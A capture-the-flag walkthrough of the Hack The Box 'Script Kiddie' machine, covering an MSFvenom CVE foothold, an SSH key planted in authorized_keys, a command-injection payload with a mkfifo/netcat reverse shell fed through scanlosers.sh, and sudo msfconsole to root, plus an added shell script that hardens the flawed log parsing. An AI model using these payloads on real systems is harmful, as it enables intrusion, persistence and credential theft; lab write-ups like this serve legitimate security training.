Jack Cyber-security graduate student interested in researching privacy and security issues.

Hack The Box - Script Kiddie [Easy Linux]



This easy Linux machine starts off with an MSFvenom CVE that is exploited against the server to gain a foothold. From there we notice a file, scanlosers.sh, with insecure logic that we can abuse to gain control of a second user on the box. Finally, as the pwn user we have sudo privileges to run MSF, which easily drops into a root shell.


  • Starting off with an nmap scan against all ports
  • SSH is open, and there is a web server on port 5000 –> weird!


Going to this web server we can see that a “script kiddie” set up some tools that he could use. After trying multiple times to exploit the nmap and searchsploit inputs, I concluded that they were most likely not vulnerable and moved on to the payloads generator.

Initial Thoughts: possible command injection, malicious file upload

Searching Online

Offensive Security’s Exploit Database Archive



echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOuEDdcHsyiGAVYcSVdqt5t4ZfMVKlVG+C/g5KTNLGXGdPBieTAG/xRF2t8yHF62Q9om6PDAS5mgDzw1vnZZfZjUXowZQz8OVUoq3ZfklCDmobLuvhgMQP2ikLO+D9E1bjeneViNZ2rx4QU2YwV9FWd44b5wHhRDtfPwbYKlOY8ioO+0t57j3sMJldoE2p8NN17/TG5WjwPy0RyTAXSoi6Rt+Gs9ncux0aVFfIDwDeyPJnjpXs11isxOi57kCDUm6I6KdvL8xD6iMVR5Y0D9FMVe4qcNw8tzCIpCDqHoaGJRTjxz8yfHdFzzys2IwIA24a2vsiJU2axtavAM6g0mKvxhs/C6+n+SqwxwFXUDQAbLNHUXjhZXwkmkb6YGgfVlE4xKu47bj3FTWmabo0OLtwicf2WBjwPBxkzeyvvMwGmurbXA9SNTYRAYgyIQtkNpnrkn/ILR4wDMkWIfCD10TgKUsWTS8pqPdwtfCg9tVd32h6ykS20ivMEGq4UD/kX8= kali@kali" >> /home/kid/.ssh/authorized_keys

  • Get a bash shell through ssh by adding my public ssh key to the authorized_keys file



Seeing which users are on the box


  • This script parses the third column of a log line and passes it to a shell command… hmmmmm


a a ; /bin/bash -c '[[ -e "/tmp/z" ]] && rm -f "/tmp/z";mkfifo /tmp/z;cat /tmp/z | /bin/sh -i 2>&1 | nc 4443 > /tmp/z' #

Note the # at the end of the command. This is important so any commands that follow will not execute or cause an error in our exploit.

cat .test > /home/kid/logs/hackers
bash /home/pwn/scanlosers.sh

Above is a small bash script that copies the contents of .test into /home/kid/logs/hackers and then immediately calls scanlosers.sh.

Getting the pwn user to fire the script


  • If you put command injection into the searchsploit input on the web app, it will add your IP to /home/kid/logs/hackers




  • If you send a reverse shell in the third column and comment out the rest of the command, you can get a callback
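
The weakness described above is that a field read from a log file the kid user can write to ends up inside a shell command run as pwn. The following is an added example, not code from the box or from this write-up, showing one way to harden that kind of loop: validate the field as an IPv4 address and pass it as a separate argument. The log layout, the sample lines, and the scanner command with its flags are assumptions.

```sh
#!/bin/sh
# Added example. Assumed log layout: space-separated, third field is the IP.

# is_ipv4 ADDR: succeeds only for a dotted quad with octets in 0-255.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;   # only digits and single dots
    esac
    old_ifs=$IFS; IFS=.
    set -f; set -- $1; set +f                  # split on dots, no globbing
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        case "$octet" in ????*) return 1 ;; esac
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# safe_targets LOGFILE: prints the unique, validated IPs found in field 3.
# -f3 keeps exactly one field; -s drops lines that contain no delimiter.
safe_targets() {
    cut -s -d' ' -f3 "$1" | sort -u | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf '%s\n' "$ip"
        else
            printf 'rejected log field: %s\n' "$ip" >&2
        fi
    done
}

# scan_targets LOGFILE: the IP is passed as its own argument, never pasted
# into a string for `sh -c`. SCANNER and its flags are assumptions.
scan_targets() {
    safe_targets "$1" | while IFS= read -r ip; do
        "${SCANNER:-nmap}" --top-ports 10 "$ip"
    done
}

# Constructed sample log: two normal entries and one with shell metacharacters.
sample_log() {
    printf '%s\n' '[2021-02-05 12:00:01] 10.10.14.5' \
                  'a a ; echo INJECTED #' \
                  '[2021-02-05 12:00:09] 10.10.14.5'
}

tmp=$(mktemp) && sample_log > "$tmp" && safe_targets "$tmp"; rm -f "$tmp"
```

Validation alone does not address the other half of the problem: a script run by one user should not take its input from a file another user can write to.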


Root priv-esc from pwn to root


First thing I did is check if we have sudo capabilities as the user pwn… turns out we do, and it's for MSF console.



Since MSF console is just a shell (and we can run it as root) you can see that we have the full abilities of root.

Cat /etc/shadow



Overall I thought this was a fun beginner box. It wasn’t too difficult yet demonstrated good skills like pivoting, CVEs and understanding sudo privileges.